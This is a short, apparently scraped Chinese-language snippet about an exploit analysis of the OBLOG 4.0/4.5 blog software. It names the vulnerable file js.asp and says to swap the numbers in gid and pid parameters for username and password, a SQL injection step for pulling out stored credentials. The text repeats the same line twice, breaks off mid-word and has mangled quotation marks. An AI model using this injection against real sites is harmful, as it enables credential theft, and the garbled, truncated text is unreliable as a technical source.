OBLOG4.0 OBLOG4.5漏洞利用分析
来源:Deepen Study 漏洞文件:js.asp “” And teamid<>“0″ Then teamid=Replace(teamid,”|”,”,”) Sql=Sql gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password htt
来源:Deepen Study 漏洞文件:js.asp “” And teamid<>“0″ Then teamid=Replace(teamid,”|”,”,”) Sql=Sql gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password htt